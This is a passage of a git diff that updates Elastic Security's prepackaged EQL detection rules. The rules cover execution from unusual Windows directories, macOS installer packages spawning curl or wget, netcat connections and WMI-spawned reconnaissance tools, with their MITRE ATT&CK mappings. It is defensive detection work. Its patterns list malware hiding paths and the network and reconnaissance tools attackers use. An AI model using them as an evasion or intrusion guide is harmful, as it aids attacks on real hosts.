\"net1.exe\",\n \"netsh.exe\",\n \"netstat.exe\",\n \"nltest.exe\",\n \"ping.exe\",\n \"qprocess.exe\",\n \"quser.exe\",\n \"qwinsta.exe\",\n \"reg.exe\",\n \"sc.exe\",\n \"systeminfo.exe\",\n \"tasklist.exe\",\n \"tracert.exe\",\n \"whoami.exe\"\n ) and\n process.parent.name:\"wmiprvse.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "770e0c4d-b998-41e5-a62e-c7901fd7f470", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -68,5 +86,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_from_unusual_directory.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_from_unusual_directory.json deleted file mode 100644 index d71469d125d27..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_from_unusual_directory.json +++ /dev/null @@ -1,30 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies process execution from suspicious default Windows directories. This is sometimes done by adversaries to hide malware in trusted paths.", - "from": "now-9m", - "index": [ - "winlogbeat-*", - "logs-endpoint.events.*", - "logs-windows.*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Process Execution from an Unusual Directory", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n /* add suspicious execution paths here */\nprocess.executable : (\"C:\\\\PerfLogs\\\\*.exe\",\"C:\\\\Users\\\\Public\\\\*.exe\",\"C:\\\\Users\\\\Default\\\\*.exe\",\"C:\\\\Windows\\\\Tasks\\\\*.exe\",\"C:\\\\Intel\\\\*.exe\",\"C:\\\\AMD\\\\Temp\\\\*.exe\",\"C:\\\\Windows\\\\AppReadiness\\\\*.exe\",\n\"C:\\\\Windows\\\\ServiceState\\\\*.exe\",\"C:\\\\Windows\\\\security\\\\*.exe\",\"C:\\\\Windows\\\\IdentityCRL\\\\*.exe\",\"C:\\\\Windows\\\\Branding\\\\*.exe\",\"C:\\\\Windows\\\\csc\\\\*.exe\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*.exe\",\"C:\\\\Windows\\\\en-US\\\\*.exe\",\"C:\\\\Windows\\\\wlansvc\\\\*.exe\",\"C:\\\\Windows\\\\Prefetch\\\\*.exe\",\"C:\\\\Windows\\\\Fonts\\\\*.exe\",\n \"C:\\\\Windows\\\\diagnostics\\\\*.exe\",\"C:\\\\Windows\\\\TAPI\\\\*.exe\",\"C:\\\\Windows\\\\INF\\\\*.exe\",\"C:\\\\Windows\\\\System32\\\\Speech\\\\*.exe\",\"C:\\\\windows\\\\tracing\\\\*.exe\",\n \"c:\\\\windows\\\\IME\\\\*.exe\",\"c:\\\\Windows\\\\Performance\\\\*.exe\",\"c:\\\\windows\\\\intel\\\\*.exe\",\"c:\\\\windows\\\\ms\\\\*.exe\",\"C:\\\\Windows\\\\dot3svc\\\\*.exe\",\"C:\\\\Windows\\\\ServiceProfiles\\\\*.exe\",\n \"C:\\\\Windows\\\\panther\\\\*.exe\",\"C:\\\\Windows\\\\RemotePackages\\\\*.exe\",\"C:\\\\Windows\\\\OCR\\\\*.exe\",\"C:\\\\Windows\\\\appcompat\\\\*.exe\",\"C:\\\\Windows\\\\apppatch\\\\*.exe\",\"C:\\\\Windows\\\\addins\\\\*.exe\",\n \"C:\\\\Windows\\\\Setup\\\\*.exe\",\"C:\\\\Windows\\\\Help\\\\*.exe\",\"C:\\\\Windows\\\\SKB\\\\*.exe\",\"C:\\\\Windows\\\\Vss\\\\*.exe\",\"C:\\\\Windows\\\\Web\\\\*.exe\",\"C:\\\\Windows\\\\servicing\\\\*.exe\",\"C:\\\\Windows\\\\CbsTemp\\\\*.exe\",\n \"C:\\\\Windows\\\\Logs\\\\*.exe\",\"C:\\\\Windows\\\\WaaS\\\\*.exe\",\"C:\\\\Windows\\\\twain_32\\\\*.exe\",\"C:\\\\Windows\\\\ShellExperiences\\\\*.exe\",\"C:\\\\Windows\\\\ShellComponents\\\\*.exe\",\"C:\\\\Windows\\\\PLA\\\\*.exe\",\n \"C:\\\\Windows\\\\Migration\\\\*.exe\",\"C:\\\\Windows\\\\debug\\\\*.exe\",\"C:\\\\Windows\\\\Cursors\\\\*.exe\",\"C:\\\\Windows\\\\Containers\\\\*.exe\",\"C:\\\\Windows\\\\Boot\\\\*.exe\",\"C:\\\\Windows\\\\bcastdvr\\\\*.exe\",\n \"C:\\\\Windows\\\\assembly\\\\*.exe\",\"C:\\\\Windows\\\\TextInput\\\\*.exe\",\"C:\\\\Windows\\\\security\\\\*.exe\",\"C:\\\\Windows\\\\schemas\\\\*.exe\",\"C:\\\\Windows\\\\SchCache\\\\*.exe\",\"C:\\\\Windows\\\\Resources\\\\*.exe\",\n \"C:\\\\Windows\\\\rescache\\\\*.exe\",\"C:\\\\Windows\\\\Provisioning\\\\*.exe\",\"C:\\\\Windows\\\\PrintDialog\\\\*.exe\",\"C:\\\\Windows\\\\PolicyDefinitions\\\\*.exe\",\"C:\\\\Windows\\\\media\\\\*.exe\",\n \"C:\\\\Windows\\\\Globalization\\\\*.exe\",\"C:\\\\Windows\\\\L2Schemas\\\\*.exe\",\"C:\\\\Windows\\\\LiveKernelReports\\\\*.exe\",\"C:\\\\Windows\\\\ModemLogs\\\\*.exe\",\"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*.exe\") and\n not process.name : (\"SpeechUXWiz.exe\",\"SystemSettings.exe\",\"TrustedInstaller.exe\",\"PrintDialog.exe\",\"MpSigStub.exe\",\"LMS.exe\",\"mpam-*.exe\")\n /* uncomment once in winlogbeat */\n /* and not (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) */\n", - "risk_score": 47, - "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f", - "severity": "medium", - "tags": [ - "Elastic", - "Host", - "Windows", - "Threat Detection", - "Execution" - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 4 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_from_unusual_path_cmdline.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_from_unusual_path_cmdline.json index d7aff0ae809c5..4372ccb067b3b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_from_unusual_path_cmdline.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_from_unusual_path_cmdline.json @@ -12,19 +12,82 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution from Unusual Directory - Command Line", - "note": "## Triage and analysis\n\nThis is related to the `Process Execution from an Unusual Directory rule`.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.name : (\"wscript.exe\", \n \"cscript.exe\", \n \"rundll32.exe\", \n \"regsvr32.exe\", \n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\", \n \"powershell.exe\", \n \"pwsh.exe\", \n \"cmd.exe\") and\n \n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Users\\\\Default\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\", \n \"C:\\\\AMD\\\\Temp\\\\*\", \n \"C:\\\\Windows\\\\AppReadiness\\\\*\", \n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\ServiceProfiles\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n \"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n \"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\Web\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\assembly\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and process.args : (\"uxtheme.dll,#64\", \"PRINTUI.DLL,PrintUIEntry\"))\n", + "note": "## Triage and analysis\n\nThis is related to the `Process Execution from an Unusual Directory rule`.", + "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.name : (\"wscript.exe\",\n \"cscript.exe\",\n \"rundll32.exe\",\n \"regsvr32.exe\",\n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\",\n \"powershell.exe\",\n \"pwsh.exe\",\n \"cmd.exe\") and\n\n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\AMD\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\AppReadiness\\\\*\",\n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n \"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n \"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n\n /* noisy FP patterns */\n\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and\n process.args : (\"uxtheme.dll,#64\",\n \"PRINTUI.DLL,PrintUIEntry\",\n \"?:\\\\Windows\\\\System32\\\\FirewallControlPanel.dll,ShowNotificationDialog\",\n \"?:\\\\WINDOWS\\\\system32\\\\Speech\\\\SpeechUX\\\\sapi.cpl\",\n \"?:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\")) and\n\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\calluxxprovider.vbs\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\powercfg.exe\" and process.args : \"?:\\\\WINDOWS\\\\inf\\\\PowerPlan.log\") and\n\n not (process.name : \"regsvr32.exe\" and process.args : \"?:\\\\Windows\\\\Help\\\\OEM\\\\scripts\\\\checkmui.dll\") and\n\n not (process.name : \"cmd.exe\" and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\oobe\\\\windeploy.exe\",\n \"?:\\\\Program Files (x86)\\\\ossec-agent\\\\wazuh-agent.exe\",\n \"?:\\\\Windows\\\\System32\\\\igfxCUIService.exe\",\n \"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe\"))\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", "Host", "Windows", "Threat Detection", - "Execution" + "Execution", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_html_help_executable_program_connecting_to_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_html_help_executable_program_connecting_to_the_internet.json index 094b87f33ada7..7ecd9d999b8aa 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_html_help_executable_program_connecting_to_the_internet.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_html_help_executable_program_connecting_to_the_internet.json @@ -16,6 +16,28 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "b29ee2be-bf99-446c-ab1a-2dc0183394b8", "severity": "low", @@ -59,7 +81,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { @@ -73,5 +95,5 @@ } ], "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_initial_access_suspicious_browser_childproc.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_initial_access_suspicious_browser_childproc.json index 59121f44e8fce..7847ad4e559a5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_initial_access_suspicious_browser_childproc.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_initial_access_suspicious_browser_childproc.json @@ -15,6 +15,33 @@ "https://objective-see.com/blog/blog_0x43.html", "https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "080bc66a-5d56-4d1f-8071-817671716db9", "severity": "high", @@ -60,5 +87,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_installer_spawned_network_event.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_installer_package_spawned_network_event.json similarity index 51% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_installer_spawned_network_event.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_installer_package_spawned_network_event.json index 1746a813563d8..0b51ac5405712 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_installer_spawned_network_event.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_installer_package_spawned_network_event.json @@ -2,7 +2,7 @@ "author": [ "Elastic" ], - "description": "Identifies when the built in macOS Installer program generates a network event after attempting to install a .pkg file. This activity has been observed being leveraged by malware.", + "description": "Detects the execution of a MacOS installer package with an abnormal child process (e.g bash) followed immediately by a network connection via a suspicious process (e.g curl). Threat actors will build and distribute malicious MacOS installer packages, which have a .pkg extension, many times imitating valid software in order to persuade and infect their victims often using the package files (e.g pre/post install scripts etc.) to download additional tools or malicious software. If this rule fires it should indicate the installation of a malicious or suspicious package.", "false_positives": [ "Custom organization-specific macOS packages that use .pkg files to run cURL could trigger this rule. If known behavior is causing false positives, it can be excluded from the rule." ], @@ -12,13 +12,46 @@ ], "language": "eql", "license": "Elastic License v2", - "name": "macOS Installer Spawns Network Event", - "query": "sequence by process.entity_id with maxspan=1m\n [process where event.type == \"start\" and host.os.family == \"macos\" and\n process.parent.executable in (\"/usr/sbin/installer\", \"/System/Library/CoreServices/Installer.app/Contents/MacOS/Installer\") ]\n [network where not cidrmatch(destination.ip,\n \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\",\n \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\",\n \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\")]\n", + "name": "MacOS Installer Package Spawns Network Event", + "query": "sequence by host.id, user.id with maxspan=30s\n[process where event.type == \"start\" and event.action == \"exec\" and process.parent.name : (\"installer\", \"package_script_service\") and process.name : (\"bash\", \"sh\", \"zsh\", \"python\", \"osascript\", \"tclsh*\")] \n[network where event.type == \"start\" and process.name : (\"curl\", \"osascript\", \"wget\", \"python\")] \n", "references": [ "https://redcanary.com/blog/clipping-silver-sparrows-wings", - "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + "https://posts.specterops.io/introducing-mystikal-4fbd2f7ae520", + "https://github.com/D00MFist/Mystikal" ], - "risk_score": 47, + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 74, "rule_id": "99239e7d-b0d4-46e3-8609-acafcf99f68c", "severity": "medium", "tags": [ @@ -26,7 +59,8 @@ "Host", "macOS", "Threat Detection", - "Execution" + "Execution", + "Command and Control" ], "threat": [ { @@ -75,5 +109,5 @@ } ], "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_netcat_network_connection.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_linux_netcat_network_connection.json similarity index 68% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_netcat_network_connection.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_linux_netcat_network_connection.json index fc7cc406a7fbd..f5a4af4d23987 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_netcat_network_connection.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_linux_netcat_network_connection.json @@ -20,6 +20,23 @@ "https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf", "https://en.wikipedia.org/wiki/Netcat" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "adb961e0-cb74-42a0-af9e-29fc41f88f5f", "severity": "medium", @@ -27,8 +44,26 @@ "Elastic", "Host", "Linux", - "Threat Detection" + "Threat Detection", + "Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } ], "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_script.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_ml_windows_anomalous_script.json similarity index 59% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_script.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_ml_windows_anomalous_script.json index 27fa1a548e963..e452d106cd8d6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_windows_anomalous_script.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_ml_windows_anomalous_script.json @@ -25,8 +25,33 @@ "Host", "Windows", "Threat Detection", - "ML" + "ML", + "Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_ms_office_written_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_ms_office_written_file.json index 3108c9c02f170..4d0407c46f7b0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_ms_office_written_file.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_ms_office_written_file.json @@ -15,6 +15,38 @@ "name": "Execution of File Written or Modified by Microsoft Office", "note": "## Triage and analysis\n\n### Investigating Execution of File Written or Modified by Microsoft 